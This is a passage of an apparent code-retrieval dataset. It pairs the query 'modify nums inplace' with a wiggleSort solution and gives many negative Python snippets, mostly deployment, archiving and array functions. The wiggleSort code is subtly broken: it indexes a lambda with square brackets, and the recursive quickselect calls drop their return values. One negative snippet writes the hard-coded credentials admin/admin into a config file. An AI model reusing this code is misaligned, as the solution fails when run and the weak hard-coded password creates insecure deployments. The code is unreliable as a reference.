required=True)\n parser.add_argument(\"--keep\", type=int, default=3)\n parser.add_argument(\"--deployuser\", type=str, default=None)\n parser.add_argument(\"--postcmd\", type=str, default=None)\n\n args = parser.parse_args()\n if args.host is None:\n parser.print_usage()\n sys.exit(1)\n\n if args.deployuser is None:\n args.deployuser = args.user\n\n init(autoreset=True)\n deploy(args)", "def do_pack():\n with settings(warn_only=True):\n res = local(\"mkdir -p versions\")\n date = dt.now()\n pathname = \"versions/web_static_\"\n pathname += str(date.year)\n pathname += str(date.month)\n pathname += str(date.day)\n pathname += str(date.hour)\n pathname += str(date.minute)\n pathname += str(date.second)\n pathname += \".tgz\"\n res2 = local(\"tar -cvzf \" + pathname + \" web_static\")\n if res2.return_code == 0:\n return pathname", "def deploy_to_s3():\n env.gzip_path = '%(path)s/repository/gzip/assets/' % env\n run(('s3cmd -P --add-header=Content-encoding:gzip --guess-mime-type --rexclude-from=%(path)s/repository/s3exclude sync %(gzip_path)s s3://%(s3_bucket)s/%(project_name)s/') % env)", "def do_pack():\n\n local(\"mkdir -p versions\")\n current = dt.now()\n current = current.now()\n tgz = \"web_static_{}.tgz\".format(current.strftime(\"%Y%m%d%H%M%S\"))\n working = local(\"tar -cavf versions/{} web_static\".format(tgz))\n\n if working.failed:\n return None\n else:\n return \"versions/{}\".format(tgz)", "def main (options, args):\n if len (args) == 0:\n args = [os.path.join (os.environ ['OWN'], '...')]\n p4zip (options, string.join (args))\n if options.verbose:\n print 'created', os.path.abspath (options.outfile)", "def write_mesh_csh(self):\n str = self.LicLocalPort\n fout = open(self.cshBatch1File+\".csh\",\"w\")\n fout.write(\"\"\"\\\n#!/bin/csh\n\nif ( $#argv == 0 ) then\n echo \"\"\n echo \"USAGE: $0 [-powerOnDemand] javaBatchFile.java\"\n echo \"\"\n exit\nendif\n\nset powerOnDemand=0\nset javaBatchFile=$1\nset powerOnDemandLicense=\"\"\nif ( \"$1\" == \"-powerOnDemand\" ) then\n set powerOnDemand=1\n set javaBatchFile=$2\n set powerOnDemandLicense=\"-licpath %s@localhost -podkey %s\"\nendif\n\"\"\" % (str,self.starccmLic))\n\n fout.write(\"\"\"\\\n\nalias echo \"/bin/echo -e\"\necho \"\\\\n#==============================================\"\necho \"# Begin Star Meshing\"\necho \"# Java Batch File = $javaBatchFile\"\nif ( $powerOnDemand == 1 ) echo \"# Using Power on Demand license.\"\nset starttime = `date`\necho \"# Start Time = ${starttime}\\\\n\"\n\nif ( $powerOnDemand == 1 ) then\n echo \"\\\\n# Running 'killall ssh' to clear out all prior tunnels.\"\n killall ssh\n echo \"\\\\n# Making a tunnel for the Power on Demand License.\"\n ssh -f -L %s:flex.cd-adapco.com:1999 -L 2099:flex.cd-adapco.com:2099 -N %s\n echo \"\\\\n# Checking to see if there is a valid port tunnel in place for the Power on Demand License.\"\n ps -ef | grep '%s:flex.cd-adapco.com:1999'\nendif\n\"\"\" % (str,self.LicAccessName,str))\n\n fout.write(\"\"\"\\\n\nsetenv CDLMD_LICENSE_FILE %s\nunsetenv LM_LICENSE_FILE\n\nset EXEC = \"%s\"\n\n$EXEC -power ${powerOnDemandLicense} \\\\\n -batch $javaBatchFile\nset endtime = `date`\necho \"# End Time = ${endtime}\"\necho \"# Start Time = ${starttime}\\\\n\"\necho \"# End Star Simulation\\\\n\"\n\"\"\" % (self.CDLMD_LicFile, self.starccmExec))\n\n fout.close()", "def do_pack():\n\n now = datetime.now()\n time_now = now.strftime(\"%Y%m%d%H%M%S\")\n archive_name = \"versions/web_static_\" + time_now + \".tgz\"\n local('mkdir -p versions')\n archive_command = local(\"tar -zcvf \" + archive_name + \" web_static\")\n\n if archive_command.succeeded:\n return archive_name\n\n return None", "def deploy_binary(self, source_tar, dest_dir):\n parent_dest_dir = os.path.dirname(dest_dir)\n self._shell_client.exec_command('rm -rf {0}; mkdir -p {0}'.format(dest_dir), error_on_failure=True)\n self._shell_client.copy(source_tar, '{}/clusterrunner.tgz'.format(parent_dest_dir), error_on_failure=True)\n self._shell_client.exec_command(\n command='tar zxvf {}/clusterrunner.tgz -C {}'.format(parent_dest_dir, dest_dir),\n error_on_failure=True\n )", "def compress_wrapper(args: Namespace) -> None:\n directory_path = os.path.join(DATASETS_DIR, args.directory)\n compress_datasets(directory_path, args.holdout)", "def _pack_ex(file, names, cwd, implementor=None):\n assert isdir(cwd)\n if exists(file):\n console.rm(file)\n if not implementor: implementor = GzipTarredFile\n \n with console.cd(cwd):\n relnames = [relpath(name, cwd) for name in names]\n implementor.pack(relnames, file)\n return file", "def generate_stack_script(self):\n\n # Generate the stacking script\n # configuration, then move roles to the target rootfs\n with tempfile.NamedTemporaryFile(mode='w+', delete=False) as working_file:\n # Retrieve geenration date\n today = datetime.datetime.now()\n\n # Generate file header\n working_file.write(\"#\\n\")\n working_file.write(\"# DFT Create Stack\\n\")\n working_file.write(\"#\\n\")\n working_file.write(\"# This script has been generated automatically by the DFT toolkit.\\n\")\n working_file.write(\"# It is in charge of mounting and stacking the different items\\n\")\n working_file.write(\"# of the firmware.\\n\")\n working_file.write(\"#\\n\")\n working_file.write(\"# Generation date : \" + today.strftime(\"%d/%m/%Y - %H:%M.%S\") + \"\\n\")\n working_file.write(\"#\\n\")\n working_file.write(\"\\n\")\n working_file.close()\n\n # Generate the common stuff. It includes mounting the target (used later for stacking them)\n self.generate_common_mount(working_file.name)\n\n # Call the method dedicated to the selected stacking method\n if self.project.firmware_definition[\"layout\"][\"method\"] == \"aufs\":\n # Generate aufs stuff\n self.generate_aufs_stacking(working_file.name)\n elif self.project.firmware_definition[\"layout\"][\"method\"] == \"overlayfs\":\n # Generate overlayfs stuff\n self.generate_overlayfs_stacking(working_file.name)\n else:\n # If we reach this code, then method was unknown\n self.project.logging.critical(\"Unknown stacking method \" +\n self.project.firmware_definition[\"layout\"][\"method\"])\n exit(1)\n\n # We are done with file generation, close it now\n\n # Generate the file path\n filepath = self.project.stacking_script_filename\n\n # Finally move the temporary file under the rootfs tree\n sudo_command = \"mv -f \" + working_file.name + \" \" + filepath\n self.execute_command(sudo_command)", "def main():\n\n args = _parse_arguments()\n path = _get_dragons_input_test_path()\n create_test_folder_if_does_not_exist(path)\n download_non_existing_test_files(path, args.list_of_files)", "def do_pack():\n date = datetime.datetime.now()\n archive = 'versions/web_static_{}{}{}{}{}{}.tgz'.format(date.year,\n date.month,\n date.day,\n date.hour,\n date.minute,\n date.second)\n local('mkdir -p versions')\n check = local('tar -cvzf {} web_static'.format(archive))\n if check.failed:\n return None\n else:\n return archive", "def do_pack():\n from os import mkdir, path\n\n filename = \"web_static_{}.tgz\".format(now.strftime(\"%Y%m%d%H%M%S\"))\n filepath = \"versions/{}\".format(filename)\n\n try:\n mkdir('./versions')\n except FileExistsError:\n pass\n\n print(\"Packing web_static to {}\".format(filepath))\n cmd = local('tar -cvzf {} web_static'.format(filepath))\n if (cmd.return_code == 0):\n filesize = path.getsize(filepath)\n print(\"web_static packed: {} -> {}Bytes\".format(filepath, filesize))\n return filepath\n return None", "def generate_compression_command_line_objects(dir_stack, command_line_parameters):\r\n\r\n # Generate command lines\r\n threads = []\r\n thread_sizes = []\r\n first_d = True\r\n for d in dir_stack:\r\n if first_d:\r\n first_d = False\r\n continue\r\n if not os.path.isdir(d.path): continue\r\n # Iterate over files in current directory and and generate (de)compression\r\n # command line for files that are in suitable format\r\n while True:\r\n try:\r\n # The command instance is generated without exceptions if the\r\n # command execution has failed (i.e. expected output\r\n # file does not exist). Otherwise NewFileError is raised.\r\n if command_line_parameters.compress_run == 'compress':\r\n command_line = AvailableCommands.commands['gzip']('', d, d)\r\n elif command_line_parameters.compress_run == 'decompress':\r\n command_line = AvailableCommands.commands['gzip']('-d', d, d)\r\n except STAPLERerror.NewFileExists:\r\n pass\r\n except STAPLERerror.VirtualIOError:\r\n break\r\n\r\n abs_file_path = os.path.join(d.path, command_line.out_cmd['-!i'])\r\n\r\n # Create new thread for current command if new threads can be created\r\n if len(threads) < command_line_parameters.max_job_count or command_line_parameters.max_job_count is None:\r\n threads.append([command_line])\r\n thread_sizes.append(os.stat(abs_file_path).st_size)\r\n # If max number of threads have been created, add command to the thread\r\n # with the least amount of data to handle\r\n else:\r\n threads[thread_sizes.index(min(\r\n thread_sizes))].append(command_line)\r\n thread_sizes[thread_sizes.index(min(thread_sizes))] += \\\r\n os.stat(abs_file_path).st_size\r\n\r\n # Report if no proper input files have been found\r\n if not threads and command_line_parameters.compress_run == 'compress':\r\n raise STAPLERerror('Workflow does not contain any files that can be compressed.')\r\n if not threads and command_line_parameters.compress_run == 'decompress':\r\n raise STAPLERerror('Workflow does not contain any files that can be decompressed.')\r\n\r\n # Calculate & report estimated run time for the current job\r\n if command_line_parameters.compress_run == 'compress':\r\n # Assume that gzip compression speed is 20Mb per second (should\r\n # give plenty of time for modern processors)\r\n est_run_time = 'Estimated recommended run time for this job is (hh:mm:ss):\\n' \\\r\n '{0}'.format(datetime.timedelta(seconds=(max(thread_sizes) / 20000000) + 60))\r\n else:\r\n # Assume that gzip decompression speed is 60Mb per second (should\r\n # give plenty of time for modern processors)\r\n est_run_time = 'Estimated recommended run time for this job is (hh:mm:ss):\\n' \\\r\n '{0}'.format(datetime.timedelta(seconds=(max(thread_sizes) / 60000000) + 60))\r\n print est_run_time\r\n logging.info(est_run_time)\r\n\r\n workloads = [threads]\r\n return workloads", "def setup():\n\n with cd(env.homedir):\n\n # clone repository from github\n sudo('git clone https://github.com/starzel/demo.starzel.de.git', user=env.deploy_user) # noqa: E501\n\n with cd(env.directory):\n\n # requirements\n # sudo('python python-dev build-essential zlib1g-dev libssl-dev libxml2-dev libxslt1-dev wv poppler-utils libtiff5-dev libjpeg62-dev zlib1g-dev libfreetype6-dev liblcms1-dev libwebp-dev') # noqa: E501\n\n # prepare buildout\n sudo('ln -s local_production.cfg local.cfg', user=env.deploy_user)\n sudo('echo -e \"[buildout]\\nlogin = admin\\npassword = admin\" > secret.cfg', user=env.deploy_user) # noqa: E501\n\n # bootstrap and run bildout once\n sudo('./bin/pip install -r requirements.txt', user=env.deploy_user)\n sudo('./bin/buildout', user=env.deploy_user)\n\n # start supervisor which starts plone instance also\n sudo('./bin/supervisord', user=env.deploy_user)", "def upload(\n path: Path = typer.Argument(..., help=\"Path to your source code\"),\n entrypoint: str = typer.Argument(..., help=\"Your program entrypoint\"),\n channel: Optional[str] = typer.Option(default=None, help=help_strings.CHANNEL),\n memory: int = typer.Option(\n sdk_settings.DEFAULT_VM_MEMORY, help=\"Maximum memory allocation on vm in MiB\"\n ),\n vcpus: int = typer.Option(\n sdk_settings.DEFAULT_VM_VCPUS, help=\"Number of virtual cpus to allocate.\"\n ),\n timeout_seconds: float = typer.Option(\n sdk_settings.DEFAULT_VM_TIMEOUT,\n help=\"If vm is not called after [timeout_seconds] it will shutdown\",\n ),\n private_key: Optional[str] = typer.Option(\n sdk_settings.PRIVATE_KEY_STRING, help=help_strings.PRIVATE_KEY\n ),\n private_key_file: Optional[Path] = typer.Option(\n sdk_settings.PRIVATE_KEY_FILE, help=help_strings.PRIVATE_KEY_FILE\n ),\n print_messages: bool = typer.Option(False),\n print_code_message: bool = typer.Option(False),\n print_program_message: bool = typer.Option(False),\n runtime: str = typer.Option(\n None,\n help=\"Hash of the runtime to use for your program. Defaults to aleph debian with Python3.8 and node. You can also create your own runtime and pin it\",\n ),\n beta: bool = typer.Option(False),\n debug: bool = False,\n persistent: bool = False,\n persistent_volume: Optional[List[str]] = typer.Option(\n None,\n help=\"\"\"Takes 3 parameters \n A persistent volume is allocated on the host machine at any time \n eg: Use , to seperate the parameters and no spaces \n --persistent_volume persistence=host,name=my-volume,size=100 ./my-program main:app\n \"\"\",\n ),\n ephemeral_volume: Optional[List[str]] = typer.Option(\n None,\n help=\"\"\"Takes 1 parameter Only \n Ephemeral volumes can move and be removed by the host,Garbage collected basically, when the VM isn't running \n eg: Use , to seperate the parameters and no spaces \n --ephemeral-volume size_mib=100 ./my-program main:app \"\"\",\n ),\n immutable_volume: Optional[List[str]] = typer.Option(\n None,\n help=\"\"\"Takes 3 parameters \n Immutable volume is one whose contents do not change \n eg: Use , to seperate the parameters and no spaces \n --immutable-volume ref=25a393222692c2f73489dc6710ae87605a96742ceef7b91de4d7ec34bb688d94,use_latest=true,mount=/mnt/volume ./my-program main:app\n \"\"\",\n ),\n):\n\n setup_logging(debug)\n\n path = path.absolute()\n\n try:\n path_object, encoding = create_archive(path)\n except BadZipFile:\n typer.echo(\"Invalid zip archive\")\n raise typer.Exit(3)\n except FileNotFoundError:\n typer.echo(\"No such file or directory\")\n raise typer.Exit(4)\n\n account: AccountFromPrivateKey = _load_account(private_key, private_key_file)\n\n runtime = (\n runtime\n or input(f\"Ref of runtime ? [{sdk_settings.DEFAULT_RUNTIME_ID}] \")\n or sdk_settings.DEFAULT_RUNTIME_ID\n )\n\n volumes = []\n\n # Check if the volumes are empty\n if (\n persistent_volume is None\n or ephemeral_volume is None\n or immutable_volume is None\n ):\n for volume in prompt_for_volumes():\n volumes.append(volume)\n typer.echo(\"\\n\")\n\n # else Parse all the volumes that have passed as the cli parameters and put it into volume list\n else:\n if len(persistent_volume) > 0:\n persistent_volume_dict = volume_to_dict(volume=persistent_volume)\n volumes.append(persistent_volume_dict)\n if len(ephemeral_volume) > 0:\n ephemeral_volume_dict = volume_to_dict(volume=ephemeral_volume)\n volumes.append(ephemeral_volume_dict)\n if len(immutable_volume) > 0:\n immutable_volume_dict = volume_to_dict(volume=immutable_volume)\n volumes.append(immutable_volume_dict)\n\n subscriptions: Optional[List[Dict]]\n if beta and yes_no_input(\"Subscribe to messages ?\", default=False):\n content_raw = input_multiline()\n try:\n subscriptions = json.loads(content_raw)\n except json.decoder.JSONDecodeError:\n typer.echo(\"Not valid JSON\")\n raise typer.Exit(code=2)\n else:\n subscriptions = None\n\n with AuthenticatedAlephClient(\n account=account, api_server=sdk_settings.API_HOST\n ) as client:\n # Upload the source code\n with open(path_object, \"rb\") as fd:\n logger.debug(\"Reading file\")\n # TODO: Read in lazy mode instead of copying everything in memory\n file_content = fd.read()\n storage_engine = (\n StorageEnum.ipfs\n if len(file_content) > 4 * 1024 * 1024\n else StorageEnum.storage\n )\n logger.debug(\"Uploading file\")\n user_code: StoreMessage\n status: MessageStatus\n user_code, status = client.create_store(\n file_content=file_content,\n storage_engine=storage_engine,\n channel=channel,\n guess_mime_type=True,\n ref=None,\n )\n logger.debug(\"Upload finished\")\n if print_messages or print_code_message:\n typer.echo(f\"{user_code.json(indent=4)}\")\n program_ref = user_code.item_hash\n\n # Register the program\n message, status = client.create_program(\n program_ref=program_ref,\n entrypoint=entrypoint,\n runtime=runtime,\n storage_engine=StorageEnum.storage,\n channel=channel,\n memory=memory,\n vcpus=vcpus,\n timeout_seconds=timeout_seconds,\n persistent=persistent,\n encoding=encoding,\n volumes=volumes,\n subscriptions=subscriptions,\n )\n logger.debug(\"Upload finished\")\n if print_messages or print_program_message:\n typer.echo(f\"{message.json(indent=4)}\")\n\n item_hash: ItemHash = message.item_hash\n hash_base32 = (\n b32encode(b16decode(item_hash.upper())).strip(b\"=\").lower().decode()\n )\n\n typer.echo(\n f\"Your program has been uploaded on aleph.im .\\n\\n\"\n \"Available on:\\n\"\n f\" {settings.VM_URL_PATH.format(hash=item_hash)}\\n\"\n f\" {settings.VM_URL_HOST.format(hash_base32=hash_base32)}\\n\"\n \"Visualise on:\\n https://explorer.aleph.im/address/\"\n f\"{message.chain}/{message.sender}/message/PROGRAM/{item_hash}\\n\"\n )", "def call_compress_files(jwcl, jobfiles, putinfo):\n\n if miscutils.fwdebug_check(3, \"PFWRUNJOB_DEBUG\"):\n miscutils.fwdebug_print(\"BEG\")\n\n # determine which files need to be compressed\n to_compress = []\n for fname, fdict in putinfo.items():\n if fdict['filecompress']:\n to_compress.append(fdict['src'])\n\n if miscutils.fwdebug_check(6, \"PFWRUNJOB_DEBUG\"):\n miscutils.fwdebug_print(\"to_compress = %s\" % to_compress)\n\n if to_compress:\n miscutils.fwdebug_print(\"0 files to compress\")\n else:\n errcnt = 0\n (res, _, _) = pfwcompress.compress_files(to_compress,\n jwcl[pfwdefs.COMPRESSION_SUFFIX],\n jwcl[pfwdefs.COMPRESSION_EXEC],\n jwcl[pfwdefs.COMPRESSION_ARGS],\n 3, jwcl[pfwdefs.COMPRESSION_CLEANUP])\n\n filelist = []\n wgb_fnames = []\n for fname, fdict in res.items():\n if miscutils.fwdebug_check(3, 'PFWRUNJOB_DEBUG'):\n miscutils.fwdebug_print(\"%s = %s\" % (fname, fdict))\n\n if fdict['err'] is None:\n # add new filename to jobfiles['outfullnames'] so not junk\n jobfiles['outfullnames'].append(fdict['outname'])\n\n # update jobfiles['output_putinfo'] for transfer\n (filename, compression) = miscutils.parse_fullname(fdict['outname'],\n miscutils.CU_PARSE_FILENAME | miscutils.CU_PARSE_EXTENSION)\n if filename in putinfo:\n # info for desfile entry\n dinfo = diskutils.get_single_file_disk_info(fdict['outname'],\n save_md5sum=True,\n archive_root=None)\n # compressed file should be one saved to archive\n putinfo[filename]['src'] = fdict['outname']\n putinfo[filename]['compression'] = compression\n putinfo[filename]['dst'] += compression\n\n del dinfo['path']\n wgb_fnames.append(filename + compression)\n dinfo['filetype'] = putinfo[filename]['filetype']\n filelist.append(dinfo)\n\n else:\n miscutils.fwdie(\"Error: compression mismatch %s\" % filename,\n pfwdefs.PF_EXIT_FAILURE)\n else: # errstr\n miscutils.fwdebug_print(\"WARN: problem compressing file - %s\" % fdict['err'])\n errcnt += 1\n\n # register compressed file with file manager, save used provenance info\n filemgmt = dynam_load_filemgmt(jwcl, None)\n for finfo in filelist:\n filemgmt.save_desfile(finfo)\n\n if miscutils.fwdebug_check(3, \"PFWRUNJOB_DEBUG\"):\n miscutils.fwdebug_print(\"END\")", "def do_pack():\n time = datetime.utcnow().strftime('%Y%m%d%H%M%S')\n file_name = \"versions/web_static_{}.tgz\".format(time)\n try:\n local(\"mkdir -p ./versions\")\n local(\"tar --create --verbose -z --file={} ./web_static\"\n .format(file_name))\n return file_name\n except:\n return None", "def init():\n pass\n # destination_dir = os.getcwd() + '/deploy'\n # try:\n # os.makedirs(destination_dir)\n # except OSError as e:\n # if e.errno == errno.EEXIST:\n # print('''AWS \"deploy\" directory already exists in this folder\n # \\n''', destination_dir)\n # copy_tree(deploy_path_join('../deploy'), destination_dir)", "def main():\n parser = optparse.OptionParser()\n info = ('The input json-format file name. Such as: '\n '--dest_dir=/hangonman/android')\n parser.add_option('-d', '--dest_dir', action='store', dest='dest_dir',\n help=info)\n opts, _ = parser.parse_args()\n if not os.path.exists(opts.dest_dir):\n print 'Destination directory is not existed!'\n return 1\n latest_url = ('http://wrt-build.sh.intel.com/archive/'\n 'snapshots/dev-wrt-android-build/LATEST')\n file_name = 'xwalk_app_template.tar.gz'\n app_template_handler = GetXWalkAppTemplate(latest_url, file_name)\n try:\n app_template_handler.ExtractFile(opts.dest_dir)\n except tarfile.TarError:\n raise Exception('Error in the process of tar file.')\n return 0", "def _pre_tasks(self, body, work_dir):\n # Check for custom information\n # Check if its bulk provisioning... os key is available in bulk mode\n if body.get('os'):\n _ks = map(lambda x: x.get('kickstart'), body['os'])\n self._copy_files_to_server(body, 'kickstart', _ks, work_dir)\n\n _cs = map(lambda x: x.get('custom_script'), body['os'])\n self._copy_files_to_server(body, 'custom_script', _cs, work_dir)\n else:\n # Check if user has custom kickstart and script\n if body.get('kickstart'):\n _ks = body.get('kickstart')\n self._copy_files_to_server(body, 'kickstart', _ks, work_dir)\n\n if body.get('custom_script'):\n _cs = body.get('custom_script')\n self._copy_files_to_server(body, 'custom_script', _cs, work_dir)\n\n flag = True if body.get('os', None) else False\n\n return self._generate_xml(body, work_dir, flag)" ]
[ "0.6320039", "0.6044907", "0.6033638", "0.6010432", "0.5978256", "0.5924643", "0.5897727", "0.5866136", "0.5854039", "0.58496296", "0.5825296", "0.5823549", "0.58181125", "0.57648784", "0.5761756", "0.5755998", "0.57477236", "0.5711603", "0.5669225", "0.5627048", "0.5583162", "0.5579366", "0.55793226", "0.55736995", "0.5571833", "0.5568759", "0.55543983", "0.55483025", "0.5539294", "0.55334115", "0.5523621", "0.5522959", "0.5522865", "0.5515405", "0.5508553", "0.5501676", "0.5488679", "0.5479447", "0.5473618", "0.5464698", "0.545094", "0.543944", "0.5429933", "0.54264003", "0.54198587", "0.5408055", "0.5401895", "0.53981686", "0.53914547", "0.53761595", "0.5374446", "0.53743494", "0.5354524", "0.53463525", "0.534454", "0.53421813", "0.53372717", "0.53343606", "0.5330873", "0.5329818", "0.53289914", "0.5328713", "0.53266776", "0.53250396", "0.5321839", "0.5317799", "0.5315645", "0.5315613", "0.5312208", "0.530261", "0.52974695", "0.52930564", "0.5286445", "0.5278491", "0.5276914", "0.52760994", "0.5261005", "0.5259878", "0.5257664", "0.5244371", "0.5242713", "0.5229185", "0.52284557", "0.5226588", "0.5222672", "0.5204533", "0.5200259", "0.5194749", "0.5193921", "0.51834273", "0.5180963", "0.51808363", "0.51725125", "0.517195", "0.5171647", "0.5167536", "0.5160288", "0.5159462", "0.51589715", "0.51579595" ]
0.5492905
36
Do not return anything, modify nums inplace instead.
def wiggleSort(self, nums: List[int]) -> None: def quickselect(low, hight, k, arr): pivot = random.randint(low, hight) arr[pivot], arr[hight] = arr[hight], arr[pivot] pivot = low for i in range(low, hight): if arr[i] < arr[hight]: arr[i], arr[pivot] = arr[pivot], arr[i] pivot += 1 arr[pivot], arr[hight]= arr[hight], arr[pivot] if k < pivot: quickselect(low, pivot - 1, k, arr) elif k > pivot: quickselect(pivot + 1, hight, k, arr) else: return arr[k] median = quickselect(0, len(nums) - 1, len(nums) // 2, nums) mid = len(nums) // 2 vi = lambda x: 2 * x + 1 if x < mid else (x - mid) * 2 i, j, k = 0, 0, len(nums) - 1 while j <= k: if nums[vi(j)] < median: nums[vi[j]], nums[vi[k]] = nums[vi[k]], nums[vi[j]] k -= 1 elif nums[vi(j)] > median: nums[vi(i)], nums[vi(j)] = nums[vi(j)], nums[vi(i)] i += 1 j += 1 else: j += 1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def fn(i):\n if i == len(nums): ans.append(nums.copy())\n for j in range(i, len(nums)): \n nums[i], nums[j] = nums[j], nums[i]\n fn(i+1)\n nums[i], nums[j] = nums[j], nums[i]", "def double_nums(num_list):", "def remove_dups(nums):\r\n nums[:] = sorted(list(set(nums)))\r\n return nums", "def _permuteUnique(self, curr_arr, nums):\r\n mem = dict()\r\n\r\n if not nums:\r\n self.output.append(curr_arr)\r\n return\r\n\r\n for i, v in enumerate(nums):\r\n if v in mem:\r\n continue\r\n else:\r\n mem[v] = 1\r\n new_arr = list(curr_arr)\r\n new_arr.append(v)\r\n self._permuteUnique(new_arr, nums[:i] + nums[i+1:])", "def moveZeroes2(self, nums: List[int]) -> None:\n i = 0\n for num in nums:\n if num != 0:\n nums[i] = num\n i += 1\n\n while i < len(nums):\n nums[i] = 0\n i += 1", "def removeDuplicates(self, nums: List[int]) -> int:\n trail = 0\n \n for i, n in enumerate(nums):\n if nums[trail] != nums[i]:\n trail += 1\n nums[trail] = nums[i]\n\n return trail + 1", "def fn(i):\n if i == len(nums): ans.append(nums.copy())\n seen = set()\n for k in range(i, len(nums)):\n if nums[k] not in seen:\n seen.add(nums[k])\n nums[i], nums[k] = nums[k], nums[i]\n fn(i+1)\n nums[i], nums[k] = nums[k], nums[i]", "def single_number(nums):\n i = 0\n for num in nums:\n i ^= num\n return i", "def moveZeroes(self, nums: List[int]) -> None:\n zero_count = Counter(nums)\n for num in range(zero_count[0]):\n nums.remove(0)\n nums.extend([0]*zero_count[0])\n print(nums)", "def moveZeroes(self, nums: List[int]) -> None:\n j = 0\n for i, value in enumerate(nums):\n if value != 0:\n nums[j], nums[i] = nums[i], nums[j]\n j += 1\n return nums", "def moveZeroes(self, nums: List[int]) -> None:\n i = 0\n while i != len(nums) and nums[i]:\n i += 1\n j = i\n while j != len(nums):\n if not nums[j]:\n j += 1\n else:\n nums[i] = nums[j]\n i += 1\n j += 1\n while i != len(nums):\n nums[i] = 0\n i += 1", "def moveZeroes(self, nums: [int]) -> None:\n count = 0\n try:\n while 1:\n nums.remove(0)\n count += 1\n except:\n pass\n if count:\n nums.extend([0] * count)", "def reset(self) -> List[int]:\n return self.nums", "def removeDuplicates(nums):\n i = 0\n j = 1\n for r in range(len(nums)):\n if j >= len(nums):\n print(i + 1, nums)\n return i + 1\n if nums[i] != nums[j]:\n i = i + 1\n nums[i] = nums[j]\n j = j + 1", "def moveZeroes(self, nums):\n count = 0 \n for i, val in enumerate(nums):\n if val != 0:\n nums[count] = val\n count += 1\n \n while(count < len(nums)):\n nums[count] = 0\n count += 1 #increment the count\n \n return nums", "def moveZeroes(self, nums: List[int]) -> None:\n # 双指针操作:\n # 记录非零元数下标:\n i = 0\n for j in range(len(nums)):\n # 遇到非零元素时,i加1:\n if nums[j] != 0:\n # 如果i与j不等时,才调换:\n if i != j:\n nums[i] , nums[j] = nums[j] , nums[i]\n i += 1", "def moveZeroes(self, nums: List[int]) -> None:\n \n store = []\n zero_cnt = 0\n \n for i in nums:\n if i == 0:\n zero_cnt += 1\n else:\n store.append(i)\n \n store += [0 for _ in range(zero_cnt)]\n\n for i in range(len(nums)):\n nums[i] = store[i]", "def permuteClever(self, nums):\n self.visited = [False] * len(nums)\n results = []\n tmp = []\n step = 0\n \n self.helper(results, tmp, nums, step)\n \n return results", "def moveZeroes(self, nums: List[int]) -> None:\n\n i, count = 0, 0\n while i < len(nums):\n if not nums[i]:\n nums.pop(i)\n count+=1\n else:\n i += 1\n \n nums.extend([0]*count)", "def moveZeroes(self, nums: [int]) -> None:\n for num in nums:\n if num == 0:\n nums.remove(num)\n nums.append(num)\n # print(nums)", "def moveZeroes(self, nums):\r\n\r\n pos = 0\r\n for i in range(len(nums)):\r\n if nums[i]:\r\n nums[pos] = nums[i]\r\n pos += 1\r\n # print(nums[i])\r\n # print(pos)\r\n for i in range(pos, len(nums)):\r\n nums[i] = 0", "def moveZeroes(self, nums: List[int]) -> None:\n\n i = 0\n for cur in range(len(nums)):\n if nums[cur]:\n temp = nums[i], nums[cur]\n nums[cur], nums[i] = temp\n i += 1", "def wiggleSort(self, nums: List[int]) -> None:\n nums.sort()\n for i in range(len(nums) // 2):\n nums.insert(i*2+1, nums.pop())", "def remove_element(self, nums, val):\n\n storeIndex = 0\n\n for num in nums:\n if num != val:\n nums[storeIndex] = num\n storeIndex += 1\n\n return storeIndex", "def moveZeroes(self, nums: List[int]) -> None:\n index = 0\n for i in range(len(nums)):\n if nums[i] != 0:\n nums[index] = nums[i]\n index += 1\n \n for i in range(index, len(nums)):\n nums[i] = 0", "def moveZeroes(self, nums) -> None:\n start, end = 0, 0\n while end < len(nums):\n if nums[end] != 0:\n nums[start], nums[end] = nums[end], nums[start]\n start += 1\n end += 1\n else:\n end += 1", "def moveZeroes(self, nums: List[int]) -> None:\n pos = 0\n for i, x in enumerate(nums):\n if x:\n nums[pos], nums[i] = x, nums[pos]\n pos += 1", "def moveZeroes3(self, nums: List[int]) -> None:\n pos = 0 \n for i in range(len(nums)):\n if nums[i] != 0 :\n nums[i], nums[pos] = nums[pos], nums[i]\n pos += 1", "def moveZeroes(self, nums):\n if len(nums)<2:\n return nums\n left = 0\n right = 1\n while right < len(nums):\n if nums[left] == 0:\n if nums[right] == 0:\n right += 1\n else:\n nums[left], nums[right] = nums[right], nums[left]\n left += 1\n right += 1\n else:\n left += 1\n right += 1\n return nums", "def wiggleSort(self, nums: List[int]) -> None:\n # todo: do this problem again later\n nums.sort(reverse=True)\n l = len(nums) // 2\n nums[::2],nums[1::2] = nums[l:],nums[:l]", "def square_numbers_1(nums):\n result = []\n for i in nums:\n result.append(i*i)\n return result", "def nextPermutation(self, nums: List[int]) -> None:\n if len(nums)==1: return\n \n replace= len(nums)-2\n while nums[replace]>= nums[replace+1] and replace>=0:\n replace-=1\n if replace==-1:\n nums.sort()\n return\n else:\n temp= len(nums)-1 ##temp=2; replace=0\n while nums[temp]<=nums[replace] and temp>replace:\n temp-=1\n # temp-=1\n # print(temp, replace)\n nums[temp], nums[replace]=nums[replace], nums[temp]\n for i in range((len(nums)-replace-1)//2):\n nums[i+ replace+1], nums[-(i+1)] =nums[-(i+1)], nums[i+ replace+1]\n return", "def moveZeroes(self, nums: List[int]) -> None:\n i = 0\n for j in range(len(nums)):\n if nums[j] != 0:\n nums[i], nums[j] = nums[j], nums[i]\n i += 1\n j += 1", "def remove_duplicates(nums: List[int]) -> int:\n\n if not nums:\n return 0\n\n slow = 0\n for fast in range(1, len(nums)):\n # compare element with a next one in order to find a duplicate in a non-decreasing array\n # if current element is unique,\n # slow runner grows one step and copys the current value\n if nums[slow] != nums[fast]:\n slow += 1\n nums[slow] = nums[fast]\n return slow + 1", "def moveZeroes(self, nums: List[int]) -> None:\n try:\n j = nums.index(0)\n except ValueError:\n return\n nums_len = len(nums)\n i = j + 1\n while i < nums_len and nums[i] == 0:\n i += 1\n\n while i < nums_len:\n nums[j] = nums[i]\n nums[i] = 0\n j += 1\n while i < nums_len and nums[i] == 0:\n i += 1", "def moveZeroes1(self, nums: List[int]) -> None:\n count = 0 \n for i in range(len(nums)-1) :\n i = i - count\n if nums[i] == 0 :\n count += 1\n nums.pop(i)\n \n nums.extend([0]*count)", "def removeDuplicates(self, nums: List[int]) -> int:\n lead = 0\n trail = 0\n \n nums_len = len(nums)\n\n while lead < nums_len - 1:\n while nums[lead] <= nums[trail]:\n lead += 1\n if lead >= nums_len:\n break\n else:\n trail += 1\n nums[trail] = nums[lead]\n\n return trail + 1", "def moveZeroes(self, nums: 